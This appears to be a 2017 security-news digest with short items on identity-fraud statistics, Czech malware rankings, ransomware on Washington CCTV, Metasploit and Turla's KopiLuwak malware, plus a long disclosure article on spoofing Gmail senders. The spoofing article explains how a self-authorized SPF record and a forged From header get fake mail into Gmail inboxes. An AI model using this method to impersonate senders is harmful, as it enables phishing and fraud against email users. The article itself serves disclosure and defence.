While the level point-of-sale (POS) fraud remained almost unchanged compared to 2014 and 2015 levels, account takeovers (ATO) and losses rose notably in 2016. ATO losses registered a 61% increase compared to the previous year, reaching $2.3 billion, while incidence went up 31%.
According to the research and consulting firm, account takeover remains one of the most challenging fraud types for consumers. Victims, the company says, pay an average of $263 out of pocket costs to resolve an incident. The total hours spent to solve this type of fraud was 20.7 million in 2016, a 6 million hour increase over 2015.
The study also says that fraudsters have become much better at avoiding detection, with new-account fraud (NAF) victims being notably more likely to discover fraud through review of their credit report (15%) or when they were contacted by a debt collector (13%).
The annual Identity Fraud Study has surveyed 69,000 respondents since 2003, and identified and analyzed four consumer personas for this year: Offline Consumers, Social Networkers, e-Commerce Shoppers and Digitally Connected.
Because they have little online presence, Offline Consumers are exposed to less fraud risks, but they incur higher fraud amounts than other fraud victims and need more than 40 days to detect fraud. Because they share their social life on digital platforms but have little presence on e- or m-commerce sites, Social Networkers face a 46% higher risk of account takeover fraud.
E-commerce buyers (including mobile shoppers) expose their financial information and are at risk of existing card fraud. However, 78% of them detect fraud within one week of it beginning, thus minimizing losses. As for the Digitally Connected Consumer category, it includes people that have extensive social network activity, shop online frequently, and adopt new digital technologies fast. They face a 30% higher risk to be a fraud victim.
“After five years of relatively small growth or even decreases in fraud, this year’s findings drives home that fraudsters never rest and when one areas is closed, they adapt and find new approaches. The rise of information available via data breaches is particularly troublesome for the industry and a boon for fraudsters. To successfully fight fraudsters, the industry needs to close security gaps and continue to improve and consumers must be proactive too,” Al Pascual, senior vice president, research director and head of fraud & security, Javelin Strategy & Research, said.
The 2017 ID Fraud survey was conducted among 5,028 U.S. adults over age 18 on KnowledgePanel, the company said. The sample is believed to be representative of the U.S. census demographics distribution, recruited from the Knowledge Networks panel. The data was collected between Nov 5 and Nov 21, 2016.
České uživatele stále častěji ohrožují škodící downloadery
3.2.2017 SecurityWorld Viry
I když dominance malwaru Danger skončila, nahradily jej další nebezpečené stahovače škodlivého kódu.
Naprostá převaha škodlivého kódu Danger nad všemi ostatními internetovými hrozbami v Česku prozatím pominula.
V lednu sice tento malware nadále představoval nejčetněji detekovanou hrozbu, nicméně jeho podíl klesl o více než 30 procentních bodů na 11,05 procenta. Naopak posilovaly jiné typy škodlivých kódů, jak vyplývá ze statistiky společnosti Eset.
„Pokles podílu downloaderu Danger je opravdu významný. V prosinci představoval téměř každou druhou zaznamenanou hrozbu, v lednu jen každou desátou. Zjistili jsme však významný nárůst výskytu různých typů malware rodiny TrojanDownloader,“ říká Miroslav Dvořák, technický ředitel Esetu.
Podle něj jde stejně jako v případě Dangeru o kód snažící do napadeného zařízení nahrát další škodlivé kódy.
Druhou nejčetnější lednovou hrozbou v Česku byl zástupce výše uvedené rodiny, konkrétně pak VBA/TrojanDownloader.Agent.CHO, který představoval 5,03 procenta zachycených případů.
Na třetí pozici se dostal malware Changer, který Eset detekuje jako JS/ProxyChanger. Tento škodlivý kód umožňuje přesměrovat legitimní požadavek na útočníkem nastrčenou stránku a získat tak například číslo kreditní karty oběti. Changer stál za 4,36 procenty případů zjištěných internetových útoků v Česku.
Top 10 hrozeb v České republice za leden 2017:
1. JS/Danger.ScriptAttachment (11,05 %)
2. VBA/TrojanDownloader.Agent.CHO (5,03 %)
3. JS/ProxyChanger (4,36 %)
4. JS/TrojanDownloader.Nemucod (4,12 %)
5. JS/Kryptik.RE (3,38 %)
6. VBA/TrojanDownloader.Agent.CIY (2,55 %)
7. VBA/TrojanDownloader.Agent.CIQ (2,04 %)
8. Java/Adwind (2,01 %)
9. JS/TrojanDownloader.Iframe (1,73 %)
10. PowerShell/TrojanDownloader.Agent.DV (1,58 %)
Zdroj: Eset, únor 2017
Nová centra v Česku i na Slovensku
Eset rovněž zahájil provoz nových center zaměřených na výzkum a vývoj -- tyto pobočky vznikají v Brně a slovenské Žilině.
„Centrum v Brně jsme vybrali kvůli geografické blízkosti k bratislavské centrále, tamnímu zázemí technologických univerzit a samozřejmě i IT talentům, kteří jsou v tomto regionu k dispozici,“ říká technologický ředitel společnosti Eset Juraj Malcho.
V případě západoslovenské Žiliny půjde o třetí pracoviště společnosti na Slovensku. Vedle centrály v Bratislavě už Eset má vývojové centrum v Košicích, které se zaměřuje především na antispamové technologie. Oproti tomu specialisté z pobočky v Žilině budou spolupracovat na vývoji firemních produktů Esetu.
Two Arrested for Hacking Washington CCTV Cameras Before Trump Inauguration
3.2.2017 thehackernews Hacking
Two Arrested in London for Hacking Washington CCTV Cameras Before Trump Inauguration
Two suspected hackers have reportedly been arrested in London on suspicion of hacking 70 percent of the CCTV cameras in Washington with ransomware ahead of President Donald Trump's inauguration last month.
The arrest took place on 20th January by the officers from the National Crime Agency (NCA) of UK after it received a request from United States authorities, but it has not been disclosed until now.
The NCA raided a house in the south of London last month and detained a British man and a Swedish woman, both 50-years-old, reported The Sun.
Some 123 of the 187 police CCTV cameras used to monitor public areas in Washington DC stopped working on 12 January, just 8 days before the inauguration of Donald Trump, after a cyber attack hit the storage devices.
The cyber attack lasted for about three days, eventually leaving the CCTV cameras out of recording anything between 12 and 15 January.
It was reported that the surveillance cameras were left useless after a ransomware made its way onto the storage devices that records feds data from CCTV cameras across the city. The hackers demanded ransom money, but the Washington DC Police rejected their demand.
Ransomware is an infamous piece of malware that has been known for locking up computer files and then demanding a ransom in Bitcoins in order to help victims unlock their files.
However, instead of fulfilling ransom demands of hackers, the DC police took the storage devices offline, removed the infection and rebooted the systems across the city.
The storage devices were successfully put back to rights, and the surveillance cameras were back to work. According to authorities, no valuable data was lost, and the ransomware infection merely crippled the affected computer network devices.
The "officers executed a search warrant at an address in Natal Road, SW16, on the evening of Thursday 19 January. A man and a woman were arrested and later bailed until April 2017," according to the NCA.
The intention of these two 50-year-old suspects is still unclear.
Popular hacking toolkit Metasploit adds hardware testing capabilities
3.2.2017 securityaffeirs Hacking
The Metasploit hacking toolkit now includes a new hardware bridge that makes it easier for users to analyze hardware devices.
The popular offensive hacking toolkit Metasploit now is powerful, it included a hardware bridge to conduct security tests on hardware. It is a great support to the users that have to test hardware, including IoT devices.
Metasploit already includes more than 1,600 exploits and 3,300 modules, with a huge hacking community that works on news modules and scripts.
Up until now, the Metasploit allowed the creation of custom scripts for hardware testing, now the update to the Hardware Bridge API will allow users to test a variety of hardware including vehicles’ CAN buses.
The new Hardware Bridge API gives a precious instrument to customers focused on the development of hardware exploits.
The first update to the Hardware Bridge API focuses is specifically designed for the testing of automotive systems, Rapid7 that manages the tool will soon add other modules to extend the capabilities of its product.
Metasploit aim to be an institutional tool for a wide range of hardware platforms, including SCADA and industrial control systems (ICS), IoT systems, and software defined radio (SDR). The company believes the new capability makes Metasploit an ideal tool for conducting hardware-based network research.
“Metasploit condensed a slew of independent software exploits and tools into one framework and now we want to do the same for hardware,”
“Every wave of connected devices – regardless of whether you’re talking about cars or refrigerators – blurs the line between hardware and software. As we like to say, this hardware bridge lets you exit the Matrix and directly affect real, physical things,” explained Craig Smith, director of transportation research at Rapid7. “We’re working to give security professionals the resources they need to test and ensure the safety of their products — no matter what side of the virtual divide they’re on.”
“Much in the same way that the Metasploit framework helped unify tools and exploits for networks and software, the Hardware Bridge looks to do the same for all types of hardware.”
Russian cyber espionage group Turla leverages on a new JavaScript Malware
3.2.2017 securityaffeirs Virus
The Russia-linked cyber espionage group known as Turla has been using a new piece of JavaScript malware to profile victims, Kaspersky Lab reported on Thursday.
Turla is the name of a Russian cyber espionage ATP group (also known as Waterbug, Venomous Bear and KRYPTON) that has been active since at least 2007 targeting government organizations and private businesses.
The list of victims is long and includes also the Swiss defense firm RUAG and the US Central Command.
The Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents.
Now experts at Kaspersky Lab have discovered a new piece of JavaScript malware linked to the dreaded group, the last string of attacks targeted organizations in Greece, Qatar, and Romania.
In November both Kaspersky Lab and Microsoft discovered a new JavaScript payload designed mainly to avoid detection.
View image on TwitterView image on TwitterView image on TwitterView image on Twitter
Follow
John Lambert @JohnLaTwC
Qatar #malware DOC extracts payload by regex and drops a very interesting .JS backdoor #DFIR https://pastebin.com/2Wb3hH2S
4:55 PM - 28 Jan 2017
145 145 Retweets 177 177 likes
The new JavaScript malware dubbed KopiLuwak has been delivered to at least one victim leveraging a document containing an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus.
The malicious document has been sent by the Qatar ambassador’s secretary, researchers from Kaspersky speculate the cyber spies may have breached the diplomatic organization’s network.
“Based on the name of the document (National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc, it is presumed it may have been sent from the Qatar Ambassador’s secretary to the MoFA, possibly indicating Turla already had control of at least one system within Qatar’s diplomatic network.” states the report published by Kaspersky.
Malware researchers discovered that author of the KopiLuwak used multiple JavaScript layers to avoid detection, the malicious code gain persistence on the targeted machine by creating a registry key. Once infected a system, the malicious code is able executes a series of commands to collect information and exfiltrate data. Stolen data are temporarily stored in a file that is deleted after it’s encrypted and stored in memory.
The KopiLuwak JavaScript malware is controlled through a collection of compromised websites, the IP address of those websites are hardcoded into the malicious code.
“The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the actors to run arbitrary commands via Wscript.” continues the analysis.
The C&C can send arbitrary commands to the infected system using Wscript.shell.run().
Kaspersky has analyzed the malware by using the “sinkholing technique,” the researchers used as a sinkhole one of the C&C domains that had expired. In this way, the experts were able to analyze the traffic from infected systems that were contacting the C&C infrastructure. With this technique, the experts discovered that one of the victims used an IP address associated with the Greek Parliament.
Researchers from Kaspersky believe that KopiLuwak malware will be used more in the future.
“Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents,” explained Kaspersky’s Brian Bartholomew. “While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method.”
The Turla APT group continues to leverage on embedded macros in Office documents, an elementary technique that anyway allowed it to compromise high-value targets.
How much trust do you put into your Gmail inbox messages?
3.2.2017 securityaffeirs Security
Given the high trust we have on Gmail we tend to believe that all messages that fall into our inbox are legit and safe, but there is something to know …
1. Introduction
Taking good care of e-mail messages is certainly among the first recommendations of any information security policy and user awareness program. The involved risks range from SPAM to Spear Phishing attacks, generally aimed to steal information or infect the victim’s computer. Most malicious messages are filtered by anti-“everything” engines before ever being delivered to the user’s mailbox, although some bypass those filters and require the user’s perspicacity to be detected.
Generally, our trust on the technology security filters is proportional to the reputation of the service provider. The higher our belief on the provider, the lower tends to be our attention to the risks. Given the high trust we have on Gmail we tend to believe that all messages that fall into our inbox are legit and safe.
It turns out that, based on our findings this week at Morphus Labs, this “trust” logic should be revisited. We realized that a message that appears in your Gmail inbox folder even with an important sign, coming from one of your Gmail contacts with no spoof or security alert, may have been forged and impersonated by a fraudster or a cybercriminal. As few people may be aware of this possibility, we decided to shed light on this problem with this article.
This document is divided into four parts. First, it presents a contextualization on e-mail spoofing. Then, it passes through to our e-mail spoofing experiment scenarios involving Gmail and Yahoo. Next, it presents an extra Gmail behavior and finally, it presents advices on how users could identify Gmail spoofed messages and final words.
2. E-mail Spoofing
In this section, we will pass through some SMTP concepts and how e-mail sender spoofing occurs. If you are familiar with those concepts, you can skip to the next section.
The Simple Mail Transfer Protocol (SMTP) is the standard protocol used for email transmission over the Internet. Considering the technology evolution rate and today’s security requirements, we may say that this protocol is, at least, anachronistic. Its first version was defined in 1982 by the RFC 821 [1] and has not evolved much since – mainly in security aspects.
As stated in the previous paragraph, the SMTP protocol defines the message transport, not the message content. It defines, therefore, the mail envelop and its parameters, such as the message sender and recipient. The message content (body) and headers are defined by the standard STD 11 (RFC 5322) [2].
Basically, a SMTP transaction consists of three commands:
Mail From: establish the message return address in case of delivery failure;
Rcpt to: establish the message recipient. In case of multiple recipients, this command may be repeated for each one;
Data: this command sign the SMTP server to receive the content of the message which consists of the message headers and body.
To make it clear, let’s look at a very basic sample of a SMTP transaction in the Figure 1.
Figure 1: Simple SMTP transaction sample
Note that the directive “From:” is part of the message content and is normally equivalent to the value used in the SMTP command “mail from:”, but not necessarily. Its value can be freely specified by the system or person issuing commands to the SMTP server. Using the same sample, but now spoofing the message sender, it would be enough to change the “From: “ to the desired value, as seen in Figure 2.
Figure 2: A sample SMTP transaction with a spoofed sender
In this case, the message delivered to recipient@domain.com will look like it has been sent by SpoofedSender@anydomain.com rather than sender@domain.com. This open space for message impersonation or sender spoofing. And this is exactly the way it is done by cybercriminals or fraudsters to trick its victims to click on malicious links, for example.
Note that by using this kind of impersonation, if the recipient replies the message, it will be delivered to the spoofed address. For the example above, it would be delivered to SpoofedSener@anydomain.com.
It turns out that changing the “From:” to the desired value will almost certainly trig the recipient’s mail server anti-spam or anti-phishing to reject or quarantine the sent. If the message bypasses those filters, it will depend on the recipient to detect that the message was forged by analyzing the message headers.
Trying to avoid those filters, some spammers configure ad-hoc mail servers in a way to send spoofed messages on behalf of a certain domain by changing the “Mail from:” SMTP command and “From:” header to the desired value. This spoof strategy can be combated by the owners of the Internet domain by applying spoofing protection mechanisms, like SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail) and DMARC (Domain Message Authentication Reporting & Conformance). By using SPF, for example, you can specify the IP addresses of the mail servers that are allowed to send e-mail messages on behalf of your domain. Once this policy is stablished, it will be up to the recipient’s mail server to check the policy and reject messages coming from non-authorized servers.
3. Experiments
After some basic concepts on SMTP protocol and how e-mail spoofing occurs, it’s time to check the resilience of Gmail and Yahoo against mail spoofing. We are going impersonate the “From:“ message header value. The “Mail from:” SMTP command will be issued using an address of a generic domain owned by us.
For the experiments, we created a very simple scenario:
For the source of the spoofed messages, we used a generic “.com” domain owned by us and registered roughly a year ago that has not been used to host content nor to send e-mail;
For the mail server, we hired and configured a Linux server at Amazon EC2 with minimum resources running a Postfix default installation with the address *.*.123.26;
The accounts in Gmail and Yahoo we are going to use as recipients and senders of the spoofed messages were created for the experiments. They are: temporaryrecipient@gmail.com, temporaryrecipient@yahoo.com, temporarysender@gmail.com and temporarysender@yahoo.com.;
All the tests were done by connecting directly to our SMTP server (port 25) and issuing SMTP commands manually to make it easy to collect the evidence to this report.
Let’s get started.
3.1. Trying to spoof without SPF
In this experiment, we are going to try this scenario:
Try to impersonate Gmail and Yahoo accounts sending spoofed messages to the respective provider’s recipients. I.e.: temporarysender@gmail.com to temporaryrecipient@gmail.com and temporarysender@yahoo.com to temporaryrecipient@yahoo.com.
The SMTP server’s IP address is not allowed in SPF policy of our generic “.com” domain to send e-mails on behalf of it, as seen on Figure 3.
Figure 3: No SPF policy associated to the experiment domain
3.1.1. Trying to spoof a Gmail to Gmail message
This experiment itself consisted in sending an e-mail message to temporaryrecipient@gmail.com pretending to be from temporarysender@gmail.com. It is to be observed that email@our-generic-domain.com was set as the “Mail from:” SMTP parameter while the “From:” header was set to the forged value temporarysender@gmail.com, as seen in Figure 4.
Figure 4 – Trying to spoof Gmail to Gmail message with no SPF policy
As the result of this experiment (Figure 5), the Gmail servers rejected our spoofed message (ID: 7A14D2452C) with the error code 421-4.7.0 followed by the message “To protect our users from spam, mail sent from your IP address has been temporarily rate limited.” We can also see the error 421-4.7.0 and the message “Our system has detected that this message is suspicious due to the very low reputation of the sending IP address.”.
Figure 5 – Gmail servers rejecting the spoofed message
3.1.2. Trying to spoof a Yahoo to Yahoo message
Now, let’s see what happened in the Yahoo spoofing scenario. Similarly to Gmail scenario, we tried to send a message to temporaryrecipient@yahoo.com pretending it to be from temporarysender@yahoo.com, as seen in Figure 6.
Figure 6 – Trying to spoof Gmail to Gmail message with no SPF policy
As the result for this experiment, we verified that our Postfix mail server couldn’t deliver the message (ID 4259245CE). The error 421-4.7.0 followed by the message “suspicious due to the very low reputation of the sending IP address” was triggered as seen in Figure 7.
Figure 7: Mail rejected by Yahoo servers during the spoofed message delivery
3.2. Trying to spoof with SPF
In this experiment, we are going to try this scenario:
Try to impersonate Gmail and Yahoo accounts sending spoofed messages to the respective provider’s recipients. The same as the previous experiment.
Configure our domain’s SPF policy to allow our SMTP server to pass e-mail on behalf of it, as seen in the Figure 8. Our intention is to verify if this configuration, besides being a kind of self-authorization, could interfere in the Gmail and Yahoo anti-spoofing filters.
Figure 8: SPF policy allowing our SMTP Server
3.2.1. Trying to spoof a Gmail to Gmail message
As the previous experiment, we try to send an e-mail message to temporaryrecipient@gmail.com pretending to be from temporarysender@gmail.com. In the Figure 9, you can see the commands issued to our SMTP server in order to send the spoofed message.
Figure 9: Spoofing Gmail to Gmail with SPF policy allowing our SMTP server
In Figure 10, you can see the logs from our SMTP server while delivering the message (ID EBE852452C) to Gmail servers.
Figure 10 – SMTP logs
Unlike what happened when the SPF policy wasn’t authorizing our SMTP server, this time Gmail servers accepted our message delivery. Remains to know if the message was tagged as SPAM or something like that. To our surprise, the message was delivered to the recipient’s inbox folder, as seen in Figure 11. We got really surprised about that.
Figure 11 – Spoofed message in the recipient’s inbox folder
As you can see in Figure 12, by opening the message, the only detail that may draw the user’s attention to a suspicious “non-Gmail” message is the “via our-generic-domain.com” near the sender’s address. As it’s not an alert and it doesn’t have any warn sign, users may not pay enough attention to this detail and believe the message is legit. It’s important to note that if the user receives this message on iOS mobile app, this detail does not even appears as shown in Figure 13. The Gmail app for Android offers user the option to see the security details of the message.
Figure 12 – Spoofed message in the Gmail Web app
Figure 13 – The spoofed message seen from the Gmail iPhone mobile app
By observing the message headers, in Figure 14, we can see that the SPF check PASS and besides the unsuccessful DMARC check, the e-mail was properly delivered to the inbox folder of the recipient. Technically speaking, the DMARC test depends on SPF and DKIM tests. If both tests return Ok, DMARC will PASS. [3]
Similarly to SPF, DMARC is a configuration done at DNS zone level that informs what the recipient’s e-mail server should do with a message that does not comply to its policy. If it should be “rejected” to drop the message, “quarantine” to isolate the message or “none” if you want to inform that the message should be delivered.
Figure 15: Spoofing Yahoo to Yahoo with SPF polity SMTP transaction
Unlike Gmail, Yahoo rejected our spoofed message during the SMTP transaction with the error 554 5.7.9 followed by the message “Message not accepted for policy reasons.”. It is not clear, but the message was probably blocked because of the @yahoo.com e-mail address in “From:” message header sent from a non-Yahoo server.
Figure 16 – Spoofed message rejected by Yahoo servers
3.3. Trying to spoof message between corporative domains hosted by Google Apps
Given we had success spoofing messages between @gmail.com accounts, we became curious if the same strategy would work for corporative domains hosted by Google. For this scenario we had help from two companies that host their e-mails with Google and tried to send a spoofed message between user accounts.
The same steps from section 3.2.1 (spoofing Gmail to Gmail with SPF) were used. The results in this more sensitive scenario showed us concerning results. Not only the message was delivered without security warnings to the recipient’s inbox folder, but also the spoofed account profile picture.
3.4. Extra findings
During our experiments, we’ve found a curious scenario in which Gmail detects the spoofed message. It happened when we tried to spoof an address that apparently does not exists on Gmail user base.
In this situation, unlike the successful scenarios, Gmail forwarded the message to Spam folder and adds a special security alert informing that they could not verify if the message was really sent by gmail.com, as seen in Figure 17.
Figure 17 – Behavior when the spoofed sender is a non-existing Gmail account
Take a look at the same message at the Gmail app for iOS on Figure 18. Beyond the alert, it shows a fish hook icon as an allusion to a phishing attack.
Figure 18 – Spoofed message on Google mobile app for iOS
Another interesting finding is related the spoofed email avatar. Google loads the real spoofed email associated profile image, which increases the legitimacy perception by the message recipient, as seem in the Figure below.
Figure 19 – Spoofed sender profile picture
4. How to identify Gmail spoofed messages
Given the spoofed message is delivered to your inbox, without security warning, may have been flagged as important, shows the picture associated with the spoofed email and may not show that the message was sent through a non-google server, what can an user do to protect itself?
In this section, we give advices on how users may identify Gmail spoofed messages and avoid risks.
4.1. Examine message details on Gmail
Be aware of messages in your inbox coming from “@gmail.com” via another servers or domains. Normally, @gmail.com messages are delivered directly from the Gmail servers. Unfortunately, the “via” tag is available only in Gmail Web Application. In the mobile (Android and iOS) apps this information is not present making it harder to identify fake messages.
Additionally, you may take a look at the message details. This feature is available at Gmail Web application by clicking on the “down-arrow” near “to me”, as in Figure 20
Figure 20 – Examining message details
4.2. Examine message source
By examining the message details, you may notice the first signs of a spoofed message, but, only by examining the full message headers you can make sure about that.
You can access the message source by clicking on the drop down button near the “reply” button on Gmail Web application and choosing the “Show original” option as seen in the Figure 21.
Figure 21 – Opening message source/original
Note that the value of the field “Return-Path” in the message headers is an address of a non-Gmail domain. The value in this field is exactly the same used in the “Mail from: “ SMTP command when we forged this message.
So, suspect Gmail messages you receive with improper address on this field, as seen in Figure 22.
Figure 22 – Observing the message source
It is worth noting that, as Gmail marks messages with the “via” tag, obviously there are situations in which the message was sent by another mail server and yet is legit. Thus, not all messages marked with the “via” tag are malicious.
4.3. Report malicious or spam messages to Gmail
Finally, as you identify malicious or spoofed messages, report it to Gmail. By doing this, you will help Gmail improve its message filters. The report spam/phishing functions are available on the drop down button near the “reply” button on the Gmail Web application.
5. Final considerations
As we can see, if you have a “self-authorized-email-server” by your own domain SPF policy, you can deliver spoofed messages pretending to be any existing @gmail.com address to the inbox folder of any other @gmail.com account with no security warning.
As per the results of section 3.3, it was also possible to spoof messages between corporative domains hosted by Google Apps. Beyond the malicious actions that may target a regular Gmail account, this possibility may put at risk entire businesses.
We’ve privately contacted Google Security team informing the possibilities that we have found and the potential impact to users. They gave us a rapid feedback informing that our submission won’t be tracked as a security bug.
Although it has not been considered a security bug, in our opinion, it would be better if Gmail could at least adopt the same behavior we saw when trying to spoof a non-existing Gmail account. The alerts used in this case could prevent users from a variety of malicious actions. Additionally, we suggest to add the possibility to view message security details within the Gmail IOS app, as today users have no options to verify if they are being spoofed.
It’s worth to mention that, as per our experiments, Yahoo rejected spoofed messages in both cases. We didn’t document Outlook.com tests, but the spoofed messages we tried to send were forwarded to recipient’s SPAM folder.
As it can be used by cybercriminals or fraudsters to make victims among Gmail users, we decided to publish this article to make people aware of this possibility and protect themselves.